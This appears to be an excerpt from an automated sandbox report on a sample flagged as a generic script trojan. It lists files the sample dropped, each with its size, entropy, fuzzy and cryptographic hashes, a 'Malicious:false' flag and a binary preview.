                                                                    SHA-256:B59F932DF822AB1A87E8AAB4BBB7C549DB15899F259F4C50AE28F8D8C7CE1E72
                                                                    SHA-512:03A16FEB0601407E96BCB43AF9BDB21E5218C2700C9F3CFD5F9690D0B4528F9DC17E4CC690D8C9132D4E0B26D7FAAFD90AA3F5E57237E06FB81AAB7AB77F6C03
                                                                    Malicious:false
                                                                    Preview:..........j.h.....i.....j.)...k.8...l.C...n.K...o.P...p.]...r.c...s.t...t.}...v.....w.....y.....z.....|.....}.........................................................................L.....\.....r...............................................,...........2.....Z.....y.....................................................-.....X.....p.....u.....{.........................................!.....9.....X.....\....._.....m...................................@.....c.................................................................7.....B.....Z.....h.....................................................,.....A.....[.....{.................................................................q...........5.....;...................................#.....+.....9.....A.....G.....^.............................>.....u....................................... .....".....%.5...(.R...*.x...+.{...,.........../.....0.....1.....3.....4.6...5.X...6.....7.....8.....9.....;.....<.....=.....>.(...?.5...@.H...A.p...C.....D...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):359190
                                                                    Entropy (8bit):5.384547702191974
                                                                    Encrypted:false
                                                                    SSDEEP:6144:UINLZJl/dv1DR9S2fjDVnjHFfRmP2x1r856Rh1vtTtSLsEar:Nf7PDuAVnjHFpm+xh856RhP
                                                                    MD5:B6FCD5160A3A1AE1F65B0540347A13F2
                                                                    SHA1:4CF37346318EFB67908BBA7380DBAD30229C4D3D
                                                                    SHA-256:7FD715914E3B0CF2048D4429F3236E0660D5BD5E61623C8FEF9B8E474C2AC313
                                                                    SHA-512:A8B4A96E8F9A528B2DF3BD1251B72AB14FECCF491DD254A7C6ECBA831DFABA328ADB0FD0B4ACDDB89584F58F94B123E97CAA420F9D7B34131CC51BDBDBF3ED73
                                                                    Malicious:false
                                                                    Preview:.........._.h.$...i.5...j.A...k.P...l.[...n.c...o.h...p.u...r.{...s.....t.....v.....w.....y.....z.....|.....}............................................................. .....".....E.....S.....`.....p.....w.................................................................3.....;.....I.....Y.....a.....n.................................................................;.....P.....W.....^.....p.....}...........................................................0.....>.....C.....K.....R.....W.....a.....l...............................................$.....R.....x.................................................................'.....8.....?.....B.....C.....K.....S.....[.....c.....i.....u.............................@.....Q.....a.................................................................%.....:.....T............................................. .....".....%.....(.+...*.D...+.G...,.e.....u.../.....0.....1.....3.....4.....5.....6.5...7.H...8.\...9.i...;.w...<.....=.....>.....?.....@.....A...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):397402
                                                                    Entropy (8bit):5.301296912236702
                                                                    Encrypted:false
                                                                    SSDEEP:6144:n9BKi2azctogSrqRrhsO11GT9TeLAG3XRU2gY7OfLwH+WcMgB8HryeuRNBPJX9SO:n9FTnzZY28+2vx+0e55zoI
                                                                    MD5:745F16CA860EE751F70517C299C4AB0E
                                                                    SHA1:54D933AD839C961DD63A47C92A5B935EEF208119
                                                                    SHA-256:10E65F42CE01BA19EBF4B074E8B2456213234482EADF443DFAD6105FAF6CDE4C
                                                                    SHA-512:238343D6C80B82AE900F5ABF4347E542C9EA016D75FB787B93E41E3C9C471AB33F6B4584387E5EE76950424E25486DD74B9901E7F72876960C0916C8B9CEE9A6
                                                                    Malicious:false
                                                                    Preview:..........Q.h.@...i.Q...j.]...k.l...l.w...n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................%.....,.....3.....:.....;.....<.....>.....i.....|.......................................................................C.....V.....w.....~.....................................................*...........C.....Y.....o.................................................................0.....D.....f.................................................................*.....2.....@.....v............................................... .....,.....?.....T.....W.....k...................................................................................b.......................:.....O.....d.................................................................K.....k................................................... .....".$...%.H...(.`...*.|...+.....,.........../.....0.....1.....3.(...4.H...5.f...6.....7.....8.....9.....;.....<.....=. ...>.K...?.V...@.g...A.....C.....D...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):484003
                                                                    Entropy (8bit):5.752575429591325
                                                                    Encrypted:false
                                                                    SSDEEP:3072:fznG4qRo+yixrD1r04XURrRpZd2hy/NPNQPkwRI6dIKhUNH7bbeCsy5SWbaabF/G:fzGBRo+911WlRpZd2yNp6k5AYxVk
                                                                    MD5:38CD3EF9B7DFF9EFBBE086FA39541333
                                                                    SHA1:321EF69A298D2F9830C14140B0B3B0B50BD95CB0
                                                                    SHA-256:D8FAB5714DAFECB89B3E5FCE4C4D75D2B72893E685E148E9B60F7C096E5B3337
                                                                    SHA-512:40785871032B222A758F29E0C6EC696FBE0F6F5F3274CC80085961621BEC68D7E0FB47C764649C4DD0C27C6EE02460407775FAE9D3A2A8A59362D25A39266CE0
                                                                    Malicious:false
                                                                    Preview:............h.....i.....j.....k.....l.....m.....o.1...p.>...v.D...w.Q...y.W...z.f...|.l...}.~.........................................................................................3.....Q.....r.....x.............................(.....I.....K.....O.....w.........................................#.....J.....Z.....u..............................................._...........................................................9.....c.......................#.....3.....<.....D.....K.....T.....i.....y.............................B.....c................................... .....D.....G.....V.....q.....................................................$.....1.....D.................z.......................&.....Y.....h.....................................................7.....O...................................#.....C.....I... .R...".d...%.....(.....*.....+.....,.......J.../.h...0.q...1.....3.....4.....5.....6.g...7.....8.....9.....;.....<.....=.....>.:...?.D...@.Y...A.....C.....D.....E.....F.0...G.Z.
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):960888
                                                                    Entropy (8bit):4.2704203524429865
                                                                    Encrypted:false
                                                                    SSDEEP:12288:P8nyRnHoS7yB/rt2o6i7u7b5frUb+7G+Vma:ti6X5jUA
                                                                    MD5:CAAB4DEB1C40507848F9610D849834CF
                                                                    SHA1:1BC87FF70817BA1E1FDD1B5CB961213418680CBE
                                                                    SHA-256:7A34483E6272F9B8881F0F5A725B477540166561C75B9E7AB627815D4BE1A8A4
                                                                    SHA-512:DC4B63E5A037479BB831B0771AEC0FE6EB016723BCD920B41AB87EF11505626632877073CE4E5E0755510FE19BA134A7B5899332ECEF854008B15639F915860C
                                                                    Malicious:false
                                                                    Preview:..........7.h.t...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|."...}.4.....<.....A.....I.....Q.....Y.....`.....g.....n.....o.....p.....u...........>.....u.......................F.....g.....y...........<.....>.....J.....r.......................^.......................e.................1.....n.....................................................1.....l.....{.....~.................,.....l...........*.................-.....E.....M.....T.....f.............................I.......................S.................d.............................`.....c.......................E...............................................#.....6.....`.................".....=.................(...............................................@.............................".......................(.....h............... ....."."...%.....(.....*.....+.....,.;.....l.../.....0.....1.U...3.o...4.....5.....6.....7.....8.....9.V...;.....<.....=.....>.....?.....@.G...A.....C.....D.=.
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):407632
                                                                    Entropy (8bit):6.124197697056213
                                                                    Encrypted:false
                                                                    SSDEEP:12288:Md9PhJeKVoCGet8Oh2J7klCqZ5T7BKI8LtCq7hUoqAX:Md91UJc5184AX
                                                                    MD5:D6194FC52E962534B360558061DE2A25
                                                                    SHA1:98ED833F8C4BEAC685E55317C452249579610FF8
                                                                    SHA-256:1A5884BD6665B2F404B7328DE013522EE7C41130E57A53038FC991EC38290D21
                                                                    SHA-512:5207A07426C6CEB78F0504613B6D2B8DADF9F31378E67A61091F16D72287ADBC7768D1B7F2A923369197E732426D15A872C091CF88680686581D48A7F94988AB
                                                                    Malicious:false
                                                                    Preview:............h.....i.....j.....k.....l.....m.....o.....p.....r.....s.-...t.6...y.K...z.Z...|.`...}.r.....z.........................................................................................7.....D.....^.....k.....s.........................................3.....?.....L.....\.....c.....}.................................................................d.....z.................................................................%.....F.....j.......................................................................`.....v.............................*.....6.....L.....Y.....n.........................................................................................x...........D.....M.............................#.....6.....9.....L.....R.....[.....r...................................^.....n.....w.....}..................... .....".....%.....(.....*.M...+.P...,.........../.....0.....1.....3.....4.5...5.]...6.....7.....8.....9.....;.....<.....=.....>.....?./...@.C...A.q...C.....D.....E.....F.....G...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):439793
                                                                    Entropy (8bit):5.6365541871793114
                                                                    Encrypted:false
                                                                    SSDEEP:6144:zXtEPi5jFX4VU4EzsnHIOBoU+1Qi7t5GkzvLdyaj+teJvxY2I96Su:CEmguHLBoUnU5TzvLWeJJG6Su
                                                                    MD5:64B08FFC40A605FE74ECC24C3024EE3B
                                                                    SHA1:516296E8A3114DDBF77601A11FAF4326A47975AB
                                                                    SHA-256:8A5D6E29833374E0F74FD7070C1B20856CB6B42ED30D18A5F17E6C2E4A8D783E
                                                                    SHA-512:05D207413186AC2B87A59681EFE4FDF9DC600D0F3E8327E7B9802A42306D80D0DDD9EE07D103B17CAF0518E42AB25B7CA9DA4713941ABC7BCED65961671164AC
                                                                    Malicious:false
                                                                    Preview:..........S.h.<...i.M...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....:.....h.....v...............................................&.....7.....9.....=.....e.....................................................(.....7.....Q.....f.....m.....v.....................................................6.....A.....L.....V.....l............................. .....G.....e.....n.....v.....}...............................................).....4.....K.....]................................................................./.....G.....^.....x...........................................................Y....................... .....A.....w...............................................*.....>.....r...............................................L.....Y... .n...".~...%.....(.....*.....+.....,.......6.../.Q...0.T...1.....3.....4.....5.....6.-...7.P...8.p...9.....;.....<.....=.....>.....?.....@.....A.I...C.j.
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):437670
                                                                    Entropy (8bit):5.638618522703661
                                                                    Encrypted:false
                                                                    SSDEEP:6144:TjewdtAe6tN4tVFHzmstt4Uoo3W3sb3F5hZanXnEv9AhraszLOAty6ls1V:RR/v4UVWwF5UEabns1V
                                                                    MD5:A8CBD741A764F40B16AFEA275F240E7E
                                                                    SHA1:317D30BBAD8FD0C30DE383998EA5BE4EEC0BB246
                                                                    SHA-256:A1A9D84FD3AF571A57BE8B1A9189D40B836808998E00EC9BD15557B83D0E3086
                                                                    SHA-512:3DA91C0CA20165445A2D283DB7DC749FCF73E049BFFF346B1D79B03391AEFC7F1310D3AC2C42109044CFB50AFCF178DCF3A34B4823626228E591F328DD7AFE95
                                                                    Malicious:false
                                                                    Preview:..........C.h.\...i.m...j.y...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.......$.....).....1.....9.....A.....H.....O.....V.....W.....X.....Z...........................................................3.....O.....Q.....U.....}...........................................................7.....Q.....b.....h.....n.....................................................,.....5.....8.....?.....U.....g.....y...........................................................'.....@.....c.....g.........................................9.....[.....l...........................................................1.....H.....O.....R.....S.....].....h.....p.....w.......................].....h.......................8.....C.....U.....\.....k.....n.....y...................................S............................................. .....".....%.'...(.A...*.^...+.a...,.........../.....0.....1.....3.....4.,...5.Q...6.....7.....8.....9.....<.....=.....>.....?.....@.....A.i...C.....D...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):998155
                                                                    Entropy (8bit):4.3110320925732095
                                                                    Encrypted:false
                                                                    SSDEEP:12288:T6ALnHOE47/URV1BQMmWDcZubSAD7qcDs3eThx5D/7dZdO3cb:9Owoys3eT5D/79O3u
                                                                    MD5:1C81104AC2CBF7F7739AF62EB77D20D5
                                                                    SHA1:0F0D564F1860302F171356EA35B3A6306C051C10
                                                                    SHA-256:66005BC01175A4F6560D1E9768DBC72B46A4198F8E435250C8EBC232D2DAC108
                                                                    SHA-512:969294EAE8C95A1126803A35B8D3F1FC3C9D22350AA9CC76B2323B77AD7E84395D6D83B89DEB64565783405D6F7EAE40DEF7BDAF0D08DA67845AE9C7DBB26926
                                                                    Malicious:false
                                                                    Preview:..........:.h.n...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.......6.....;.....C.....K.....S.....Z.....a.....h.....i.....j.....o.................Z.......................1.....O.................k.....m.....q.......................E.............................x.................Y.............................+....._...........6.....T.....{.............................5.......................u...........,.........................................#.....K...............................................:...........,.....f.............................".....f.......................O.....................................................i................._.....}.......................`.........................................s...........T...........&...........l.......................H.....s......... .....".....%.....(.....*.T...+.W...,.........../.....0.....1.....3.....4.....5.v...6.....7.R...8.....9.....;.S...<.p...=.....>.....?.....@.....A.U...C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):816652
                                                                    Entropy (8bit):4.350418506868822
                                                                    Encrypted:false
                                                                    SSDEEP:3072:ZE7bv9/9xAvtACKjxUp0djbOXspvibMFFPMUh3RQR3KB+5lx14/H4bmHwMaZ0t4k:ZE7b1fOACsxZjAEV6yZ00VbJ5JgezP5
                                                                    MD5:2CF9F07DDF7A3A70A48E8B524A5AED43
                                                                    SHA1:974C1A01F651092F78D2D20553C3462267DDF4E9
                                                                    SHA-256:23058C0F71D9E40F927775D980524D866F70322E0EF215AA5748C239707451E7
                                                                    SHA-512:0B21570DEEFA41DEFC3C25C57B3171635BCB5593761D48A8116888CE8BE34C1499FF79C7A3EBBE13B5A565C90027D294C6835E92E6254D582A86750640FE90F2
                                                                    Malicious:false
                                                                    Preview:........|.|.h.....i.....j.....k.....l.*...n.2...o.7...p.D...r.J...s.[...t.d...v.y...w.....y.....z.....|.....}.........................................................................q...................................5.....G.....Y.............................<.....a.......................,.....B.....w.......................^.....}.................................................................D.....M.....P.....l.......................A.......................<.....O.....W.....^.....j.............................2.............................J.......................P.....s...................................-.....N.....r.....................................................2...........b...................................K.....d.........................................@.................,.....m.......................:.....]............... .....".....%.J...(.....*.....+.....,.......!.../.]...0.j...1.....3.....4.4...5.n...6.....7.....8.X...9.....;.....<.....=.....>.%...?.8...@.g...A.....C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):374453
                                                                    Entropy (8bit):5.272284824619555
                                                                    Encrypted:false
                                                                    SSDEEP:6144:DZ/AO2kUDrt2MBrIxFQJulcul5WkS/PSOW5soNY3MMyvek:DZ/ApkUDrt2MOxSIl51kP05RYcMA
                                                                    MD5:AEE105366A1870B9D10F0F897E9295DB
                                                                    SHA1:EEE9D789A8EEAFE593CE77A7C554F92A26A2296F
                                                                    SHA-256:C6471AEE5F34F31477D57F593B09CB1DE87F5FD0F9B5E63D8BAB4986CF10D939
                                                                    SHA-512:240688A0054BFEBE36EA2B056194EE07E87BBBEB7E385131C73A64AA7967984610FCB80638DD883837014F9BC920037069D0655E3E92A5922F76813AEDB185FA
                                                                    Malicious:false
                                                                    Preview:..........8.h.r...i.z...j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.).....1.....6.....>.....F.....N.....U.....\.....c.....d.....e.....j...........................................................A.....X.....Z.....^...........................................................+.....9.....M.....Z.....a.....f.....u.......................................................................*.....9.....M.....d.......................................................................$.....6.....d.....x.....................................................).....=.....@.....T.....h.....z...................................................................................e...................................$...../.....A.....L.....V.....^.....e.....|...................................1.....F.....L.....R.....a.....v......... .....".....%.....(.....*.....+.....,.......$.../.:...0.D...1.x...3.....4.....5.....6.....7.....8.&...9.9...;.M...<.X...=.i...>.....?.....@.....A...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):367614
                                                                    Entropy (8bit):5.435724855090923
                                                                    Encrypted:false
                                                                    SSDEEP:6144:TAJxNH0uqnIhgFYMqOp7fwcbgtmX07Sgzuu5Dn4XYnOGrr:ExdfqnPFYMqOp7fwcwSgB5Dn4LGrr
                                                                    MD5:55D5AD4EACB12824CFCD89470664C856
                                                                    SHA1:F893C00D8D4FDB2F3E7A74A8BE823E5E8F0CD673
                                                                    SHA-256:4F44789A2C38EDC396A31ABA5CC09D20FB84CD1E06F70C49F0664289C33CD261
                                                                    SHA-512:555D87BE8C97F466C6B3E7B23EC0210335846398C33DBA71E926FF7E26901A3908DBB0F639C93DB2D090C9D8BDA48EDDF196B1A09794D0E396B2C02B4720F37E
                                                                    Malicious:false
                                                                    Preview:..........P.h.B...i.Y...j.e...k.t...l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................%.....-.....4.....;.....B.....C.....D.....F.....m.....x.................................................................".....J.....^.....v.....{.....................................................)...../.....5.....D.....T.....c.......................................................................-.....J.....c.....{.......................................................................+.....6.....@.....Y.....o.......................................................................%.....5.....I.....P.....S.....T.....[.....c.....n.....u.......................*...........x...........................................................,.....I.....`.....y...............................................'.....2... .7...".@...%.Z...(.z...*.....+.....,.........../.....0.....1.....3. ...4.:...5.O...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.....A.?...C.\.
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):379453
                                                                    Entropy (8bit):5.379227569652463
                                                                    Encrypted:false
                                                                    SSDEEP:6144:KcJ9Smne7gqDO5EQHzpamU3D+qn7Cv5qPxOGpLMsLPW:Km9nCgqDO5ELrOv5qPxOGpLM+PW
                                                                    MD5:0F04BAC280035FAB018F634BCB5F53AE
                                                                    SHA1:4CAD76EAECD924B12013E98C3A0E99B192BE8936
                                                                    SHA-256:BE254BCDA4DBE167CB2E57402A4A0A814D591807C675302D2CE286013B40799B
                                                                    SHA-512:1256A6ACAC5A42621CB59EB3DA42DDEEACFE290F6AE4A92D00EBD4450A8B7CCB6F0CD5C21CF0F18FE4D43D0D7AEE87B6991FEF154908792930295A3871FA53DF
                                                                    Malicious:false
                                                                    Preview:..........Y.h.0...i.A...j.M...k.\...l.g...n.o...o.t...p.....r.....s.....t.....v.....w.....y.....z.....|.....}...........................................#.....*.....+.....,...........\.....h.....x.................................................................).....A.....].....k.....{...............................................)...........7.....F.....V.....e.................................................................3.....K.....o.................................................................).....0.....E.....}.........................................'.....1.....?.....^.....a.....v.............................................................................).....k.......................+.....@.....X.................................................................3.....H.....f............................................. .....".....%.....(.+...*.D...+.G...,.e.....v.../.....0.....1.....3.....4.....5.....6.J...7.b...8.....9.....;.....<.....=.....>.....?.....@.....A.....C.8...D.B.
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):422325
                                                                    Entropy (8bit):5.774687126444438
                                                                    Encrypted:false
                                                                    SSDEEP:12288:roj98jy/jojSoM/Z+Xgv3iWhbhvPeCUdxUwVTmNF1Qhjhd5UR405Y:ryMV+1Qhb5IY
                                                                    MD5:F1D48A7DCD4880A27E39B7561B6EB0AB
                                                                    SHA1:353C3BA213CD2E1F7423C6BA857A8D8BE40D8302
                                                                    SHA-256:2593C8B59849FBC690CBD513F06685EA3292CD0187FCF6B9069CBF3C9B0E8A85
                                                                    SHA-512:132DA2D3C1A4DAD5CCB399B107D7B6D9203A4B264EF8A65ADD11C5E8C75859115443E1C65ECE2E690C046A82687829F54EC855F99D4843F859AB1DD7C71F35A5
                                                                    Malicious:false
                                                                    Preview:..........R.h.>...i.O...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....:.....j.....y.....................................................!.....#.....'.....O.....g.................................................................*.....0.....6.....I.....].....o.............................................................................J.....f.............................................................................K....._.....j.....................................................<.....?.....N.....\.....k.......................................................................9.......................(.....E.....`.....................................................#.....=.....k...............................................9.....D... .M...".]...%.....(.....*.....+.....,.........../.....0."...1.Q...3.`...4.....5.....6.....7.....8.....9.....;.&...<.1...=.;...>.O...?.X...@.k...A.....C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):399250
                                                                    Entropy (8bit):5.432001310431886
                                                                    Encrypted:false
                                                                    SSDEEP:6144:oNssFqCoNBXBL3sNA65VyS15LqJVlLUoR1peV:oNssFqIF5uJH4oR/g
                                                                    MD5:8E931FFBDED8933891FB27D2CCA7F37D
                                                                    SHA1:AB0A49B86079D3E0EB9B684CA36EB98D1D1FD473
                                                                    SHA-256:6632BD12F04A5385012B5CDEBE8C0DAD4A06750DC91C974264D8FE60E8B6951D
                                                                    SHA-512:CF0F6485A65C13CF5DDD6457D34CDEA222708B0BB5CA57034ED2C4900FD22765385547AF2E2391E78F02DCF00B7A2B3AC42A3509DD4237581CFB87B8F389E48D
                                                                    Malicious:false
                                                                    Preview:..........=.h.h...i.y...j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.(.....0.....5.....=.....E.....M.....T.....[.....b.....c.....d.....i...........................................................@.....U.....W.....[...........................................................'.....A.....a.....x...............................................!.....,.....<.....I.....M.....P.....W.....l.....z.....................................................&.....,.....7.....E.....].....g.....x...................................4.....>.....N.....[.....m...................................................................................%.....,.....<.....o.......................&.....;.....R.....z.................................................................G.....e............................................. .....".....%.)...(.?...*.Z...+.]...,.{........./.....0.....1.....3.....4.....5.'...6._...7.s...8.....9.....;.....<.....=.....>.....?.....@.....A.0...C.S...D.].
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):400379
                                                                    Entropy (8bit):5.412017917472705
                                                                    Encrypted:false
                                                                    SSDEEP:6144:dqPhA4zslBWfIw2ieJVJJxhmOcXLFIUK5IKM4RV6X:EJolB/2bfK5IKM4RG
                                                                    MD5:B4954B064E3F6A9BA546DDA5FA625927
                                                                    SHA1:584686C6026518932991F7DE611E2266D8523F9D
                                                                    SHA-256:EE1E014550B85E3D18FB5128984A713D9F6DE2258001B50DDD18391E7307B4A1
                                                                    SHA-512:CB3B465B311F83B972ECA1C66862B2C5D6EA6AC15282E0094AEA455123DDF32E85DF24A94A0AEDBE1B925FF3ED005BA1E00D5EE820676D7A5A366153ADE90EF7
                                                                    Malicious:false
                                                                    Preview:..........2.h.~...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.&...|.,...}.>.....F.....K.....S.....[.....c.....j.....q.....x.....y.....z.....................................................!.....).....J.....\.....^.....b...........................................................).....<.....W.....o.....y.....................................................'.....4.....8.....;.....B.....[.....i.....z...............................................$.....*.....5.....C.....Y.....a.....r.........................................6.....A.....Q.....^.....p.............................................................................%...........5.....F.............................>.....R.....f...........................................................(.....U.....q............................................... ... .$...".8...%.S...(.i...*.....+.....,.........../.....0.....1.....3.&...4.J...5.n...6.....7.....8.....9.....;.....<.....=.....>.A...?.L...@.a...A.....C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):412797
                                                                    Entropy (8bit):5.469387509353947
                                                                    Encrypted:false
                                                                    SSDEEP:6144:Lsg4/xnSFcFG1Y6vFEsif5QB0o1s21/oulzr:Lt7FcFG1Y6vesif5QKob/dr
                                                                    MD5:D2758F6ADBAEEA7CD5D95F4AD6DDE954
                                                                    SHA1:D7476DB23D8B0E11BBABF6A59FDE7609586BDC8A
                                                                    SHA-256:2B7906F33BFBE8E9968BCD65366E2E996CDF2F3E1A1FC56AD54BAF261C66954C
                                                                    SHA-512:8378032D6FEBEA8B5047ADA667CB19E6A41F890CB36305ACC2500662B4377CAEF3DC50987C925E05F21C12E32C3920188A58EE59D687266D70B8BFB1B0169A6E
                                                                    Malicious:false
                                                                    Preview:..........Z.h.....i.?...j.I...k.X...l.c...n.k...o.p...p.}...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................&.....'.....(.....*.....e.....t.......................................................................2.....S.....p.....y...............................................-.....D.....L....._.....s...............................................2.....=.....E.....b...................................>.....O.....W....._.....f.....l.....{...............................................+.....;.....b...........................................................'.....B.....`.....t.....{.....~...............................................].............................2.....b.....m.....................................................?.....g.........................................#...../... .9...".M...%.p...(.....*.....+.....,.........../.....0.....1.....3.?...4.[...5.{...6.....7.....8.....9.....;.....<.....=.(...>.C...?.K...@.Z...A.....C.....D...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):672991
                                                                    Entropy (8bit):4.887128747074479
                                                                    Encrypted:false
                                                                    SSDEEP:12288:xkFzEroY5eXN2hHO3j/jHXzvMBJJWkKce8P/XzFGGJn/aZ/LNUFC0WGWajfG1UpM:xUQMi5y6d4
                                                                    MD5:2885BDE990EE3B30F2C54A4067421B68
                                                                    SHA1:AE16C4D534B120FDD68D33C091A0EC89FD58793F
                                                                    SHA-256:9FCDA0D1FAB7FFF7E2F27980DE8D94FF31E14287F58BD5D35929DE5DD9CBCDCA
                                                                    SHA-512:F7781F5C07FBF128399B88245F35055964FF0CDE1CC6B35563ABC64F520971CE9916827097CA18855B46EC6397639F5416A6E8386A9390AFBA4332D47D21693F
                                                                    Malicious:false
                                                                    Preview:............h.(...i.9...j.E...k.T...l._...n.g...o.l...p.y...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................".....#.....$.....&.....~...................................4.....>.....H.........................................-.....9.....X.....l...................................T.....w.............................E.....o.....y...............................................$.....?.....|.......................).....7.....?.....M.....n...................................H.....X.......................#.....D.....W.....{...................................<.....^...........................................................r.............................@.....g.............................).....>.....L.....z.................`.....~...........$.....U.....g.....{..................... .....".....%.,...(.r...*.....+.....,.........../.:...0.K...1.....3.....4.....5."...6.....7.....8.....9.....;.....<.1...=.E...>.|...?.....@.....A.-...C.e...D.v...E.....F...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):426178
                                                                    Entropy (8bit):5.821396103086126
                                                                    Encrypted:false
                                                                    SSDEEP:6144:M43lA0ct/muNypigJ4BOn5aHSL9aQCqoLWGL:91cgsypipBI5aHSL9aQCDLd
                                                                    MD5:B7E97CC98B104053E5F1D6A671C703B7
                                                                    SHA1:0F7293F1744AE2CD858EB3431EE016641478AE7D
                                                                    SHA-256:B0D38869275D9D295E42B0B90D0177E0CA56A393874E4BB454439B8CE25D686F
                                                                    SHA-512:EF3247C6F0F4065A4B68DB6BF7E28C8101A9C6C791B3F771ED67B5B70F2C9689CEC67A1C864F423382C076E4CBB6019C1C0CB9AD0204454E28F749A69B6B0DE0
                                                                    Malicious:false
                                                                    Preview:..........R.h.>...i.R...j.^...k.m...l.x...n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................&.....-.....4.....;.....<.....=.....?.....s.....................................................(.....=.....?.....C.....k.....................................................'.....7.....S.....b.....h.....p...........................................................-.....8.....V.....l.....~...........................................................#.....2.....I.....T.....o...................................8.....B.....P.....\.....k.............................................................................'...../.....;.....K.................?.....F.............................+.....F.....K.....W.....b.....k...................................N............................................. .....".....%.,...(.G...*.h...+.k...,.........../.....0.....1.....3.....4. ...5.?...6.v...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.Z...C.{...D.....E...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):411437
                                                                    Entropy (8bit):5.49350335324308
                                                                    Encrypted:false
                                                                    SSDEEP:6144:tnerKYjnS4fhmi0i2iiBnnbANjbnPMum4ocyxPbPD/yu0zrVftjQLc35BdFPcNpU:lEjnSn1iHd35vtcqO+i/fz50qg
                                                                    MD5:CA763E801DE642E4D68510900FF6FABB
                                                                    SHA1:C32A871831CE486514F621B3AB09387548EE1CFF
                                                                    SHA-256:340E0BABE5FDDBFDA601C747127251CF111DD7D79D0D6A5EC4E8443B835027DE
                                                                    SHA-512:E2847CE75DE57DEB05528DD9557047EDCD15D86BF40A911EB97E988A8FDBDA1CD0E0A81320EADF510C91C826499A897C770C007DE936927DF7A1CC82FA262039
                                                                    Malicious:false
                                                                    Preview:..........c.h.....i.-...j.7...k.F...l.Q...n.Y...o.^...p.k...r.q...s.....t.....v.....w.....y.....z.....|.....}.........................................................................B.....T.....b.....r.....z.....................................................F.....d.....|.......................................................................%.....4.....H.....W.......................................................................#.....=.....].....{.....................................................#...........>.....k.....u...............................................'.....6.....P.....U.....e.....x.............................................................................E.......................&.....I.....j.....................................................%.....=.....j...............................................&.....2... .<...".N...%.f...(.....*.....+.....,.........../.....0.....1.I...3.X...4.t...5.....6.....7.....8.....9.....;.#...<./...=.9...>.L...?.V...@.d...A.....C...
